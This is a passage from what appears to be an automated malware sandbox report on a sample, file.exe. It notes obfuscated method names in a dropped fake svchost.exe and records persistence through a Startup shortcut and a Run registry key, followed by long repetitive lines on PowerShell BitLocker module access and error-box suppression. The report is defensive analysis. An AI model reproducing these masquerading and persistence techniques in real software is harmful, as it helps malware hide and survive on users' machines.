                        Source: svchost.exe.0.dr, qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.csHigh entropy of concatenated method names: 'i7cyD0XTLEB0Eo6PcSMqpwbf4hMZg4sLYG', 'ygPwp9XZp1CNtXOvYnoSnk60K0pR4EzVwC', 'rDdzoPBPDGIhemY4IkLdEpjByHJCZf9ZZk', 'iayxv8iOD5PJUikNajoF8bAzd4OR0W1BOJ', '_5qRtMLOzp6vegzQlmGY0VvqtTEVxrzkOnV', 'sxvswXulgNMspyjbFclySjAL0qULrND153', 'ZkGh8jLFkXbpaAG3167hzW7mElum0Gzy4o', 'U0SMh7MOgaMA9emgAlTtfkDQ8K2p40TY3n', 'V9zlnJ7JAd6MhnJZXfbmyCeUH9Fp8zg3RZ', '_1kXGJPvV0iV4mL17w9kNyBIfBwGJWszAhI'

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\svchost.exeJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\svchost.exeJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                        Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                        Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
